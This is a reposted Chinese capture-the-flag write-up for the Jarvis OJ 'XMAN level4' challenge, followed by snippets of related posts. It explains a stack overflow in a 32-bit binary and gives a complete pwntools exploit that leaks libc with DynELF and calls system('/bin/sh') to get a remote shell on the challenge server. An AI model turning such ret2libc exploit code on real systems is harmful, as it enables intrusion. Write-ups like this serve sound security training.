2. 程式人生 > >XMAN-level4

XMAN-level4

阿新 發佈:2018-01-31
address symbols roo system linu soj shell bss ble

[XMAN] level4

首先checksec,信息如下

[*] ‘/root/Desktop/bin/pwn/xman-level4/level4‘
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

沒開棧保護,於是考慮棧溢出。

剛做完stack(ret2libc),看到這題直接就想到泄露libc版本,一開始嘗試和stack一樣的做法,即泄露read和write函數的地址從而找到遠程libc的版本,但是試了一發發現找不到libc版本。。。

然後就用DynELF,得到system的真實地址。用read函數將‘/bin/sh\x00‘寫入bss段,然後通過三次pop調用system函數,參數使用bss地址,即system(‘/bin/sh‘)。

exp如下

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "[email protected]"

from pwn import *
#context.log_level = "debug"

#io = process(‘./level4‘)
io = remote(‘pwn2.jarvisoj.com‘, 9880)
elf = ELF(‘./level4‘)
#libc = ELF(‘/lib/i386-linux-gnu/libc.so.6‘)
 


#get_system_addr
write_plt = elf.plt[‘write‘]
write_got = elf.got[‘write‘]
main_addr = elf.symbols[‘main‘]

def leak(address):

    payload = flat([‘a‘*0x88+‘f**k‘, write_plt, main_addr, 1, address, 4])
    io.sendline(payload)
    data = io.recv(4)
    return data

dynelf = DynELF(leak, elf=ELF(‘./level4‘
 
))
sys_addr = dynelf.lookup(‘system‘, ‘libc‘)
print ‘system_addr:‘, hex(sys_addr)

#get_the_shell
bss_addr = 0x0804A024
read_plt = elf.plt[‘read‘]
#ROPgadget --binary level4  --only "pop|ret"
ppp_addr = 0x08048509

payload = flat([‘a‘*0x88+‘f**k‘, read_plt, ppp_addr, 0, bss_addr, 8, sys_addr, 0xdeadbeef, bss_addr ])
io.sendline(payload)
io.sendline(‘/bin/sh\x00)

io.interactive()
#flag:CTF{882130cf51d65fb705440b218e94e98e}


作者: LB919

出處:http://www.cnblogs.com/L1B0/

如有轉載,榮幸之至!請隨手標明出處;

XMAN-level4

相關推薦

XMAN-level4

address symbols roo system linu soj shell bss ble [XMAN] level4 首先checksec,信息如下 [*] ‘/root/Desktop/bin/pwn/xman-level4/level4‘ Arch:

18.9.20 Jarvis OJ PWN----[XMAN]level4

checksec之後,發現可以棧溢位 找可以溢位的地方 我們可以讀取無窮無盡的數 但是在IDA中沒找到system函式,同時題目也沒有給我們lib檔案,咋辦………… 根據大佬的資料,瞭解到了pwntools的一個函式DynELF,DynELF函式可以leak

xman level4//一步一步rop level2 writeup

這道題在沒libc的情況下考洩露地址,兩個方法,一個read之後直接pop三個棧引數再返回system,另一個重新返回vulnerable,只不過read(8位元組),所以是send,不是sendline啊 另外一個大坑點在dynelf的使用,只能通過它洩漏偏移,然後用不帶

Jarvis OJ - [XMAN]level1 - Writeup

shellcode text ext recv 函數 rec spa 偏移 shell Jarvis OJ - [XMAN]level1 - Writeup M4x原創,轉載請表明出處http://www.cnblogs.com/WangAoBo/p/7594173.ht

Jarvis OJ - [XMAN]level1 - Writeup——簡單shellcode利用

adding lan raft 截取 eight .sh close ott 作者 100分的pwn 簡單查看一下,果然還是比較簡單的 放到ida中查看一下,有明顯的溢出函數,並且在函數中打印出了字符串的地址,並且字符串比較長,沒有NX保護 所以我們很容易想到

Jarvis OJ - [XMAN]level3 - Writeup——rop2libc嘗試

但是 可執行程序 pre 問題 com pad arch 進行 sea 這次除了elf程序還附帶一個動態鏈接庫 先看一下,很一般的保護 思路分析 在ida中查看,可以確定通過read函數輸入buf進行溢出,但是並沒有看到合適的目標函數 但是用ida打開附帶的鏈接庫

[轉]Jarvis OJ- [XMAN]level2/3_x64-Writeup

article lan line get adg net asc 32位 lba 學弟寫的挺好的,我就直接轉過來了 原文鏈接:http://www.cnblogs.com/ZHijack/p/7940686.html 兩道64位棧溢出,思路和之前

[XMAN]level2

address end image soj interact ima bubuko cti div 老套路 checksec ida查看 覆蓋掉 之後system地址再返回覆蓋 最後/bin/sh地址 # -*- coding:utf-

pwn-chanllege1-IO_file-XMAN

##xman-個人排位賽 ###pwn-chanllege1-IO_file 連結:https://pan.baidu.com/s/1vSrgF4iQ-2X6gQSciEPi9Q 密碼:g2hc #####這是一道簡單的io_file的題,通過這個題大概可以知道io_file的機制,總的來說

CTF-web Xman-2018 msic習題

xman misc CRC碰撞 4位元組小檔案 下載下來的是一個壓縮包,裡面是很多小的壓縮包,每個檔案只有四位元組,滿足CRC爆破。   使用指令碼,將碰撞出來的拼接在一起 # coding:utf-8 import zipfile import strin

CTF-web Xman-2018 第二天 古典密碼和現代密碼

這是大師傅的wiki https://ctf-wiki.github.io/ctf-wiki/crypto/introduction/?ADUIN=1528736192&ADSESSION=1533260489&ADTAG=CLIENT.QQ.5545_.0&ADPUBN

CTF-web Xman-2018 010 editor 簡單使用

在學msic時候,發現010是一個非常好用的工具,除了是一個檢視和修改檔案的編譯器外,還有很多自帶的指令碼可以幫助我們輔助分析檔案格式   這是他的主介面,可以通過選項改變觀察方式 在插入點的位置直接輸入就可以覆蓋原來的資料,點選delet就可以刪除前一位元組

CTF-web Xman-2018 第一天 入營msic

廣度大,深度不怎麼深,涉及的方面有各種加密,流量分析,隱寫,檔案恢復等 這種型別的題目主要是在於手中的工具要全,很多時候都是依靠工具來完成的,一部分是自己如何找到題目的要點,使用對的工具 考的東西:         細心50 &

CTF-web Xman-2018 第三天 crypto-RSA

RSA 這個演算法先不多說,在密碼學的學習中,肯定是少不了數學,要想弄明白一個密碼,基本的數學原理還是必須要懂得,其實每個步驟的大致原理必須懂,有關數學原理公式推導可以暫時不要深究,但是涉及演算法步驟的必須懂。RSA作為一個非常火熱的加密演算法,其大致的原理還是較為容易理解,而攻擊的方法也只需要

CTF-web Xman-2018 第二天 CBC加密簡單介紹

Padding oracle attack 這是一個分塊的加密演算法,當前塊的加密依靠前一個塊的加密結果,形式如下圖: 可以看出,為了滿足當前與前一塊的規則,它初始化了一個向量V,用於第一輪加密。 將分組的明文與上一組的密文進行計算得到該組的密文,繼續做下一組的【V向量】(V就是指

18.9.18 Jarvis OJ PWN----[XMAN]level0

拖進IDA 看到有函式callsystem,那就直接把主函式往它身上引 在vulnerable裡有緩衝區,試著溢位 ebp偏移量0x80個位元組,覆蓋後再用8個位元組覆蓋儲存的ebp,然後將返回地址設為callsystem函式的地址 指令碼 #coding=ut

Jarvis OJ-PWN-[XMAN]level3 wp

地址:nc pwn2.jarvisoj.com 9879 一開始拿到題目的時候是一個rar檔案 解壓後就得到了兩個檔案 對這兩個檔案檢視保護 兩個檔案都是32位的 level3沒有開啟棧保護 可以利用棧溢位;棧中內容不可使用 不用shellcode 可以看

jarvis oj level4

與level3相比沒有提供libc.so檔案。 第一步學習使用Dynelf獲取伺服器函式地址: def leak(address): payload1='a'*0x88+'bbbb'+p32(write_addr)+p32(vul_addr)+p32(1)+p32(address)+

Jarvis OJ- [XMAN]level2/3_x64-Writeup——64位簡單棧溢位

兩道64位棧溢位,思路和之前的32位溢位基本一致,所以放在一起 在這兩道中體現的32位和64位的主要區別在於函式引數傳遞的方式 在32位程式執行中,函式引數直接壓入棧中     呼叫函式時棧的結構為:呼叫函式地址->函式的返回地址->引數n->引數n-1->···->引數1 在6

CTF-web xman-2018 第八天 web 模板注入 序列化執行

    python程式碼審計 php包容性更大的語言,針對web,簡單一些所以大家用這個 python出現後,更加的中性一些,有更多的庫,以其為技術基礎的東西也很多,比如flask模板等。 企業中java多,但是不適合初學者,呼叫棧特別多,反序列化,表示式執